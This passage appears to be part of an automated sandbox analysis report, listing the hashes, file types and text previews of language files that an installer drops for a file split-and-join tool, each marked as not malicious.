                SHA-512:3498485635AFC548663715D22071611BAB10C707E8E24BE0B5143EE4A27727DA7D18A5E6959E3F6DD7D0F615DDFD50CE9FC5CE8AE6DDC5BEE287B5A00A817288
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...'..MExit->Caption =' ....'..MOptions->Caption = 'Options'..MSettings->Caption =' .........'..MLanguage->Caption =' ......'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption =' .......'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = '....'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption =' .......'..MAbout->Caption =' ...'....TabSheetSplit->Caption = ' ... .......'..TabSheetCombine->Caption = ' ...'....GroupBoxCombine->Caption =' ... .......'..LabelFirstFile->Caption = '..... .....:'..LabelOutput->Caption = '... ....:'..LabelCombineFolder->Caption =' .... ......:'..LabelSplitFolder->Caption = '.... ......:'..ButtonCombine->Caption =' ...'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = '... .......'..LabelFileName->Caption =' ..... ...: '..LabelSplitFolder->Caption =' .... ......:'
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2345
                Entropy (8bit):5.847861612631974
                Encrypted:false
                SSDEEP:48:HGj2lE8qiTh7XJ9zHadtPTTD1n34q1jgun1ITq8K:HG5RDTln34qRgusK
                MD5:A5C9FEA89EFE8E2162BA477E8EA39B44
                SHA1:E6A2042C574D14786891F0C32F92C8292BBB4ACA
                SHA-256:8DDFB50DACA491296101BAB3DB9B77C7587127E684D9E22EFD6DC93F84A008FA
                SHA-512:3F7944F262717D308A1235982E741536DA6A4DF9ABEE4E2811E1151B53C3D31811EA3EB750ED39F347F7DF14AD20FF981C85CC2DA297BE745547B36D41B8FDB9
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...(&F)'..MExit->Caption = '.......'..MOptions->Caption = '...'..MSettings->Caption = '....'..MLanguage->Caption = '....'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = '........'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '....'..MAbout->Caption = '....'....TabSheetSplit->Caption = '...'..TabSheetCombine->Caption = '...'....GroupBoxCombine->Caption = ' .......... "......" .............'..LabelFirstFile->Caption = '......'..LabelOutput->Caption = '..........'..LabelCombineFolder->Caption = '.........'..LabelSplitFolder->Caption = '.........'..ButtonCombine->Caption = '...'..ButtonStopCombine->Caption = '..'....GroupBoxSplit->Caption = ' .......... "......."............. '..LabelFileName->Caption = '.
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2687
                Entropy (8bit):5.051567814097503
                Encrypted:false
                SSDEEP:48:HGgXRVA+sqgh59WJIo4yvHIExBMHkWREHZDNbHBsBOtiSZls5crRMfiE:HGusSgEvMHfREHN9hsoiOUBiE
                MD5:D2471D35D833E2544D67365E015E6153
                SHA1:497EE8FF9519D025BD10C5AA15DDC34DFB1B334B
                SHA-256:4831DDBCFE327E2542F4565E7A948C5828D71003B8444723E1E11BA6BB43ACE7
                SHA-512:C82B30D604A679F87B8D0B1670A0D1607E25150FFCFD1C9E631241916BA93CEB5A33AFCAA9080149096ACA1913791384860F5699F2BB302B6CB190AF777EB3CE
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Programma Afsluiten'..MOptions->Caption = 'Options'..MSettings->Caption = 'Instellingen'..MLanguage->Caption = 'Kies Taal'..MLangArabic->Caption = 'Arabisch'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Nederlands'..MLangEnglish->Caption = 'Engels'..MLangFrench->Caption = 'Frans'..MLangItalian->Caption = 'Italiaans'..MLangRussian->Caption = 'Russisch'..MLangSpanish->Caption = 'Spaans'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Hulp'..MAbout->Caption = 'Info'....TabSheetSplit->Caption = 'SPLITSEN'..TabSheetCombine->Caption = 'HERENIGEN'....GroupBoxCombine->Caption = ' Drag and drop een van de te herenigen delen in 'Eerste Deel' of browse ernaartoe '..LabelFirstFile->Caption = 'Eerste Deel:'..LabelOutput->Caption = 'Output Bestandsnaam:'..LabelCombineFolder->Caption = 'Output Map:'..LabelSplitFolder->Caption = 'Output Map:'..ButtonCombine->Caption = 'HERENIGEN'..ButtonStopCombine->Caption = 'STOP'....Grou
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):2594
                Entropy (8bit):5.044497576650396
                Encrypted:false
                SSDEEP:48:HGgb5l+sqiTh7XJ9oVHo1xx0GHLVQ4ZWGAtDAEQmUDcQdWym:HGdpa1jfHLVQ4AGAtWma8H
                MD5:76776746B3CFF1CBD5D56CD44CA2DEF5
                SHA1:2F2ECA50BD7F72232BE84291EF1A7956C24098CC
                SHA-256:EC647D30931F50607CF745D958AAF0367CCEAB9999346188255CFBFB22301EE3
                SHA-512:202436C708D4F34FFCCDC3D33841246C5CEE073AC270DA547C15F9E995A08D36AE4C00982283BF60D62363046BBEAA0125D59075E4629A9D1934039CBFB00BE5
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Exit Application'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Language'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Help'..MAbout->Caption = 'About'....TabSheetSplit->Caption = 'SPLIT'..TabSheetCombine->Caption = 'JOIN'....GroupBoxCombine->Caption = ' Drag and drop one of the files to join in the 'First Part' box or browse to it '..LabelFirstFile->Caption = 'First Part:'..LabelOutput->Caption = 'Output File Name:'..LabelCombineFolder->Caption = 'Output Folder:'..LabelSplitFolder->Caption = 'Output Folder:'..ButtonCombine->Caption = 'JOIN'..ButtonStopCombine->Caption = 'STOP'....GroupBoxSplit->Caption = ' Drag
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2507
                Entropy (8bit):5.040552699764577
                Encrypted:false
                SSDEEP:48:HGkOA+sq/W7Yve3EkHaBSDbSljMM+v1/D3H:HGb8hABSDbSJMBD
                MD5:336D33F55222F48FBA19EF0911732766
                SHA1:E17A78E3B48192361DB540B1E8C9D0548C9A9FFE
                SHA-256:0E955453FA27CED0D0521F0F960C7743C2090F06263D33EC8FA978B681123E0C
                SHA-512:67EC6B859BCDD66DA59CDB1DC1A4EACFBDA12C57699012EE1573DD88F5AAAB6288E1BD9015C862689F4A1A27E83B28C3A9C99B1895EDF4F47D6F94B0557CDC1F
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Fichier'..MExit->Caption = 'Quitter'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Langage'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Flamand'..MLangEnglish->Caption = 'Englais'..MLangFrench->Caption = 'Francais'..MLangItalian->Caption = 'Italien'..MLangRussian->Caption = 'Russe'..MLangSpanish->Caption = 'Espagnol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aide'..MAbout->Caption = 'A propos de ..'....TabSheetSplit->Caption = 'Scinder'..TabSheetCombine->Caption = 'Assembler'....GroupBoxCombine->Caption = ' Faire glisser un des fichiers bloc . assembler ou rechercher le par ... '..LabelFirstFile->Caption = 'Premier Fichier:'..LabelOutput->Caption = 'Fichier de sortie: '..LabelCombineFolder->Caption = 'R.pertoire Dest.'..LabelSplitFolder->Caption = 'R.pertoire Dest.'..ButtonCombine->Caption = 'Assembler'..ButtonStopCombine->Caption = 'Stop'....GroupBoxSpl
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2729
                Entropy (8bit):5.029883215699414
                Encrypted:false
                SSDEEP:48:HGgS7++sqMsmQYEJK7bHExsA9GZ1MTn6btlOWH6r3zvX5c9WYN:HGjUoR9GXML6RYWH6rDRdYN
                MD5:8AFE543CB6791AA250312EBA61BF7C13
                SHA1:BFD229D43BE86728A634055AD65860157C2671BD
                SHA-256:AF5BFB663E715C48C55E24BC3BEA30FCAA9BE8EAF35133FBB75D54C5735696AC
                SHA-512:5CF85F84DD6D363B2AAC720CF10C5289350EB706DC2BF5CA824CF220C3607CC7969CDD2F4B2912DC97C7BE50CEDC24A9A01AFC585CE84B6B8CB81419153931A2
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Termina programma'..MOptions->Caption = 'Options'..MSettings->Caption = 'Impostazioni'..MLanguage->Caption = 'Seleziona Lingua'..MLangArabic->Caption = 'Arabo'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Olandese'..MLangEnglish->Caption = 'Inglese'..MLangFrench->Caption = 'Francese'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Russo'..MLangSpanish->Caption = 'Spagnolo'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aiuto'..MAbout->Caption = 'Informazioni'....TabSheetSplit->Caption = 'DIVIDI'..TabSheetCombine->Caption = 'UNISCI'....GroupBoxCombine->Caption = ' Drag and drop una delle parti da unire nella casella 'Prima Parte' o segui percorso '..LabelFirstFile->Caption = 'Prima Parte:'..LabelOutput->Caption = 'Nome File Uscita:'..LabelCombineFolder->Caption = 'Cartella Uscita:'..LabelSplitFolder->Caption = 'Cartella Uscita:'..ButtonCombine->Caption = 'UNISCI'..ButtonStopCombine->Caption = '
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2299
                Entropy (8bit):5.691502190790686
                Encrypted:false
                SSDEEP:48:HG9uhjkDYhqGQjsONHiHQgGU9dm6nclk6a1hg22mo6LD:HGnzLIQTUPmcclGsmogD
                MD5:F9F47FF3D866FFC4F38E315E41356E55
                SHA1:EFC313A99993B5FB8A454D4C5197C6F3965B5C89
                SHA-256:3A13CCE54190BF4A679D21F61466A0A18E9340287CAA1AA4EACB38C99C9D4957
                SHA-512:6EC1F1E19921C535A50254500ED01602DA74D3CC9E6DA8B5FC78D89255E42C5968BD294E56F584EE273630B9233C20CAFEBC906354CE393FE1CFFE91528F527A
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&....'..MExit->Caption = '.....'..MOptions->Caption = '.....'..MSettings->Caption = '.........'..MLanguage->Caption = '....'..MLangEnglish->Caption = '..........'..MLangRussian->Caption = '.......'..MLangArabic->Caption = '........'..MLangChinese->Caption = '.........'..MLangDutch->Caption = '.......'..MLangFrench->Caption = '...........'..MLangItalian->Caption = '...........'..MLangSpanish->Caption = '.........'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '......'..MAbout->Caption = '. .........'....TabSheetSplit->Caption = '.......'..TabSheetCombine->Caption = '.......'....GroupBoxCombine->Caption = ' ....... ..... '..LabelFirstFile->Caption = '1-. ....:'..LabelOutput->Caption = '........: '..LabelCombineFolder->Caption = '..........:'..ButtonCombine->Caption = '.......'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = ' ....... .... '..LabelSplitFolder->Caption = '..........:'..LabelFileName->Caption = '... .....:'..LabelFile
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2718
                Entropy (8bit):5.057121428169199
                Encrypted:false
                SSDEEP:48:HGPWFaxAA+sqKvFYLcunHh3QxXOBp1OB5r70h3CGRsJE0laDwXCqXH5wGF5JoCPa:HGPAPZBAJU1k7Jb245xVfUMG
                MD5:21B4D47F5D851271C89310C92777FB70
                SHA1:9D85FF8F7107CFAE3F31993FAF7F249591AFCB27
                SHA-256:D88AE9E292EBC4E56767892FD451E2E8278FCE776CAD689731EE7875748D55D7
                SHA-512:46F26B51D6959A36E33266887E39CB98E7E67880052DE8DE741CB93C90ED3B28C87A224CE710E6C698FE648ED8B062E73DEDC253A6C5A8362EB3EF2792AB4FBF
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Archivo'..MExit->Caption = 'Salir'..MOptions->Caption = 'Options'..MSettings->Caption = 'Herramientas'..MLanguage->Caption = 'Elegir idioma'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Holand.s'..MLangEnglish->Caption = 'Ingl.s'..MLangFrench->Caption = 'Franc.s'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Ruso'..MLangSpanish->Caption = 'Espa.ol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Ayuda'..MAbout->Caption = 'Sobre programa'....TabSheetSplit->Caption = 'SEPARAR'..TabSheetCombine->Caption = 'JUNTAR'....GroupBoxCombine->Caption = ' Drag and drop una de las partes para juntar en la celda 'Primera Parte' o navegar '..LabelFirstFile->Caption = 'Primera Parte:'..LabelOutput->Caption = 'Nombre Archivo salida:'..LabelCombineFolder->Caption = 'Carpeta salida:'..LabelSplitFolder->Caption = 'Carpeta salida:'..ButtonCombine->Caption = 'JUNTAR'..ButtonStopCombine->Caption = 'PARAR'....
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2607
                Entropy (8bit):5.234177949162883
                Encrypted:false
                SSDEEP:48:HGUyjEiB0w3l+sqiTh7XJ9UeHjIDt00AoB/nheSSMpSSSxPYe:HGpNBrkGIDt0qnheS9Sx
                MD5:E1271E0DDD609CD7F9C2367D32FEBE4B
                SHA1:0A420424F1FADE0BFF002E63AAD22B5E94B86CAC
                SHA-256:AEE6B1EDFFFCE507E2207C7E2AA36DA42B2AC54CEB28B9759B2D05F1012CBA8F
                SHA-512:86A11C9E4B59F2437180F56CAD44E69CB29B03B93983EA5E35CBCC5BDD40CFC424EE1EEF519B2E44D67623C79835AF92B4B089AC29890C046CD590C1F8BFA574
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Dosya'..MExit->Caption = 'Uygulamay. Kapat'..MOptions->Caption = 'Se.enekler'..MSettings->Caption = 'Ayarlar'..MLanguage->Caption = 'Dil'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Yard.m'..MAbout->Caption = 'Hakk.nda'....TabSheetSplit->Caption = 'PAR.ALA'..TabSheetCombine->Caption = 'B.RLE.T.R'....GroupBoxCombine->Caption = ' .lk par.ay. s.r.kleyin yada g.zat. kullan.n '..LabelFirstFile->Caption = '.lk Par.a:'..LabelOutput->Caption = 'Birle.tirme Ad.:'..LabelCombineFolder->Caption = '..kt. Klas.r.:'..LabelSplitFolder->Caption = '..kt. Klas.r.:'..ButtonCombine->Caption = 'B.RLE.T.R'..ButtonStopCombine->Caption = 'DUR'....GroupBoxSplit->Caption = ' B.lmek istedi.iniz dosyay.
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2729
                Entropy (8bit):5.029883215699414
                Encrypted:false
                SSDEEP:48:HGgS7++sqMsmQYEJK7bHExsA9GZ1MTn6btlOWH6r3zvX5c9WYN:HGjUoR9GXML6RYWH6rDRdYN
                MD5:8AFE543CB6791AA250312EBA61BF7C13
                SHA1:BFD229D43BE86728A634055AD65860157C2671BD
                SHA-256:AF5BFB663E715C48C55E24BC3BEA30FCAA9BE8EAF35133FBB75D54C5735696AC
                SHA-512:5CF85F84DD6D363B2AAC720CF10C5289350EB706DC2BF5CA824CF220C3607CC7969CDD2F4B2912DC97C7BE50CEDC24A9A01AFC585CE84B6B8CB81419153931A2
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Termina programma'..MOptions->Caption = 'Options'..MSettings->Caption = 'Impostazioni'..MLanguage->Caption = 'Seleziona Lingua'..MLangArabic->Caption = 'Arabo'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Olandese'..MLangEnglish->Caption = 'Inglese'..MLangFrench->Caption = 'Francese'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Russo'..MLangSpanish->Caption = 'Spagnolo'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aiuto'..MAbout->Caption = 'Informazioni'....TabSheetSplit->Caption = 'DIVIDI'..TabSheetCombine->Caption = 'UNISCI'....GroupBoxCombine->Caption = ' Drag and drop una delle parti da unire nella casella 'Prima Parte' o segui percorso '..LabelFirstFile->Caption = 'Prima Parte:'..LabelOutput->Caption = 'Nome File Uscita:'..LabelCombineFolder->Caption = 'Cartella Uscita:'..LabelSplitFolder->Caption = 'Cartella Uscita:'..ButtonCombine->Caption = 'UNISCI'..ButtonStopCombine->Caption = '
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2299
                Entropy (8bit):5.691502190790686
                Encrypted:false
                SSDEEP:48:HG9uhjkDYhqGQjsONHiHQgGU9dm6nclk6a1hg22mo6LD:HGnzLIQTUPmcclGsmogD
                MD5:F9F47FF3D866FFC4F38E315E41356E55
                SHA1:EFC313A99993B5FB8A454D4C5197C6F3965B5C89
                SHA-256:3A13CCE54190BF4A679D21F61466A0A18E9340287CAA1AA4EACB38C99C9D4957
                SHA-512:6EC1F1E19921C535A50254500ED01602DA74D3CC9E6DA8B5FC78D89255E42C5968BD294E56F584EE273630B9233C20CAFEBC906354CE393FE1CFFE91528F527A
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&....'..MExit->Caption = '.....'..MOptions->Caption = '.....'..MSettings->Caption = '.........'..MLanguage->Caption = '....'..MLangEnglish->Caption = '..........'..MLangRussian->Caption = '.......'..MLangArabic->Caption = '........'..MLangChinese->Caption = '.........'..MLangDutch->Caption = '.......'..MLangFrench->Caption = '...........'..MLangItalian->Caption = '...........'..MLangSpanish->Caption = '.........'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '......'..MAbout->Caption = '. .........'....TabSheetSplit->Caption = '.......'..TabSheetCombine->Caption = '.......'....GroupBoxCombine->Caption = ' ....... ..... '..LabelFirstFile->Caption = '1-. ....:'..LabelOutput->Caption = '........: '..LabelCombineFolder->Caption = '..........:'..ButtonCombine->Caption = '.......'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = ' ....... .... '..LabelSplitFolder->Caption = '..........:'..LabelFileName->Caption = '... .....:'..LabelFile
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2507
                Entropy (8bit):5.040552699764577
                Encrypted:false
                SSDEEP:48:HGkOA+sq/W7Yve3EkHaBSDbSljMM+v1/D3H:HGb8hABSDbSJMBD
                MD5:336D33F55222F48FBA19EF0911732766
                SHA1:E17A78E3B48192361DB540B1E8C9D0548C9A9FFE
                SHA-256:0E955453FA27CED0D0521F0F960C7743C2090F06263D33EC8FA978B681123E0C
                SHA-512:67EC6B859BCDD66DA59CDB1DC1A4EACFBDA12C57699012EE1573DD88F5AAAB6288E1BD9015C862689F4A1A27E83B28C3A9C99B1895EDF4F47D6F94B0557CDC1F
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Fichier'..MExit->Caption = 'Quitter'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Langage'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Flamand'..MLangEnglish->Caption = 'Englais'..MLangFrench->Caption = 'Francais'..MLangItalian->Caption = 'Italien'..MLangRussian->Caption = 'Russe'..MLangSpanish->Caption = 'Espagnol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aide'..MAbout->Caption = 'A propos de ..'....TabSheetSplit->Caption = 'Scinder'..TabSheetCombine->Caption = 'Assembler'....GroupBoxCombine->Caption = ' Faire glisser un des fichiers bloc . assembler ou rechercher le par ... '..LabelFirstFile->Caption = 'Premier Fichier:'..LabelOutput->Caption = 'Fichier de sortie: '..LabelCombineFolder->Caption = 'R.pertoire Dest.'..LabelSplitFolder->Caption = 'R.pertoire Dest.'..ButtonCombine->Caption = 'Assembler'..ButtonStopCombine->Caption = 'Stop'....GroupBoxSpl
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2266
                Entropy (8bit):5.4593359267896355
                Encrypted:false
                SSDEEP:48:HG8il+sqirh7zJ9YTHskp1r4phFAqLNnK9h:HGkSkp1r4NTKf
                MD5:4ABA9765EB3555788F5706D87A9D2DCA
                SHA1:36C0895FBF9F99690CA55C54CC56310E24513113
                SHA-256:E99B943206594C04BC0383669D04D4F191A501F46D2474FED08B997F8020B433
                SHA-512:3498485635AFC548663715D22071611BAB10C707E8E24BE0B5143EE4A27727DA7D18A5E6959E3F6DD7D0F615DDFD50CE9FC5CE8AE6DDC5BEE287B5A00A817288
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...'..MExit->Caption =' ....'..MOptions->Caption = 'Options'..MSettings->Caption =' .........'..MLanguage->Caption =' ......'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption =' .......'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = '....'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption =' .......'..MAbout->Caption =' ...'....TabSheetSplit->Caption = ' ... .......'..TabSheetCombine->Caption = ' ...'....GroupBoxCombine->Caption =' ... .......'..LabelFirstFile->Caption = '..... .....:'..LabelOutput->Caption = '... ....:'..LabelCombineFolder->Caption =' .... ......:'..LabelSplitFolder->Caption = '.... ......:'..ButtonCombine->Caption =' ...'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = '... .......'..LabelFileName->Caption =' ..... ...: '..LabelSplitFolder->Caption =' .... ......:'
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2345
                Entropy (8bit):5.847861612631974
                Encrypted:false
                SSDEEP:48:HGj2lE8qiTh7XJ9zHadtPTTD1n34q1jgun1ITq8K:HG5RDTln34qRgusK
                MD5:A5C9FEA89EFE8E2162BA477E8EA39B44
                SHA1:E6A2042C574D14786891F0C32F92C8292BBB4ACA
                SHA-256:8DDFB50DACA491296101BAB3DB9B77C7587127E684D9E22EFD6DC93F84A008FA
                SHA-512:3F7944F262717D308A1235982E741536DA6A4DF9ABEE4E2811E1151B53C3D31811EA3EB750ED39F347F7DF14AD20FF981C85CC2DA297BE745547B36D41B8FDB9
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...(&F)'..MExit->Caption = '.......'..MOptions->Caption = '...'..MSettings->Caption = '....'..MLanguage->Caption = '....'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = '........'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '....'..MAbout->Caption = '....'....TabSheetSplit->Caption = '...'..TabSheetCombine->Caption = '...'....GroupBoxCombine->Caption = ' .......... "......" .............'..LabelFirstFile->Caption = '......'..LabelOutput->Caption = '..........'..LabelCombineFolder->Caption = '.........'..LabelSplitFolder->Caption = '.........'..ButtonCombine->Caption = '...'..ButtonStopCombine->Caption = '..'....GroupBoxSplit->Caption = ' .......... "......."............. '..LabelFileName->Caption = '.
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2607
                Entropy (8bit):5.234177949162883
                Encrypted:false
                SSDEEP:48:HGUyjEiB0w3l+sqiTh7XJ9UeHjIDt00AoB/nheSSMpSSSxPYe:HGpNBrkGIDt0qnheS9Sx
                MD5:E1271E0DDD609CD7F9C2367D32FEBE4B
                SHA1:0A420424F1FADE0BFF002E63AAD22B5E94B86CAC
                SHA-256:AEE6B1EDFFFCE507E2207C7E2AA36DA42B2AC54CEB28B9759B2D05F1012CBA8F
                SHA-512:86A11C9E4B59F2437180F56CAD44E69CB29B03B93983EA5E35CBCC5BDD40CFC424EE1EEF519B2E44D67623C79835AF92B4B089AC29890C046CD590C1F8BFA574
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Dosya'..MExit->Caption = 'Uygulamay. Kapat'..MOptions->Caption = 'Se.enekler'..MSettings->Caption = 'Ayarlar'..MLanguage->Caption = 'Dil'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Yard.m'..MAbout->Caption = 'Hakk.nda'....TabSheetSplit->Caption = 'PAR.ALA'..TabSheetCombine->Caption = 'B.RLE.T.R'....GroupBoxCombine->Caption = ' .lk par.ay. s.r.kleyin yada g.zat. kullan.n '..LabelFirstFile->Caption = '.lk Par.a:'..LabelOutput->Caption = 'Birle.tirme Ad.:'..LabelCombineFolder->Caption = '..kt. Klas.r.:'..LabelSplitFolder->Caption = '..kt. Klas.r.:'..ButtonCombine->Caption = 'B.RLE.T.R'..ButtonStopCombine->Caption = 'DUR'....GroupBoxSplit->Caption = ' B.lmek istedi.iniz dosyay.
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2687
                Entropy (8bit):5.051567814097503
                Encrypted:false
                SSDEEP:48:HGgXRVA+sqgh59WJIo4yvHIExBMHkWREHZDNbHBsBOtiSZls5crRMfiE:HGusSgEvMHfREHN9hsoiOUBiE
                MD5:D2471D35D833E2544D67365E015E6153
                SHA1:497EE8FF9519D025BD10C5AA15DDC34DFB1B334B
                SHA-256:4831DDBCFE327E2542F4565E7A948C5828D71003B8444723E1E11BA6BB43ACE7
                SHA-512:C82B30D604A679F87B8D0B1670A0D1607E25150FFCFD1C9E631241916BA93CEB5A33AFCAA9080149096ACA1913791384860F5699F2BB302B6CB190AF777EB3CE
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Programma Afsluiten'..MOptions->Caption = 'Options'..MSettings->Caption = 'Instellingen'..MLanguage->Caption = 'Kies Taal'..MLangArabic->Caption = 'Arabisch'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Nederlands'..MLangEnglish->Caption = 'Engels'..MLangFrench->Caption = 'Frans'..MLangItalian->Caption = 'Italiaans'..MLangRussian->Caption = 'Russisch'..MLangSpanish->Caption = 'Spaans'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Hulp'..MAbout->Caption = 'Info'....TabSheetSplit->Caption = 'SPLITSEN'..TabSheetCombine->Caption = 'HERENIGEN'....GroupBoxCombine->Caption = ' Drag and drop een van de te herenigen delen in 'Eerste Deel' of browse ernaartoe '..LabelFirstFile->Caption = 'Eerste Deel:'..LabelOutput->Caption = 'Output Bestandsnaam:'..LabelCombineFolder->Caption = 'Output Map:'..LabelSplitFolder->Caption = 'Output Map:'..ButtonCombine->Caption = 'HERENIGEN'..ButtonStopCombine->Caption = 'STOP'....Grou
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2718
                Entropy (8bit):5.057121428169199
                Encrypted:false
                SSDEEP:48:HGPWFaxAA+sqKvFYLcunHh3QxXOBp1OB5r70h3CGRsJE0laDwXCqXH5wGF5JoCPa:HGPAPZBAJU1k7Jb245xVfUMG
                MD5:21B4D47F5D851271C89310C92777FB70
                SHA1:9D85FF8F7107CFAE3F31993FAF7F249591AFCB27
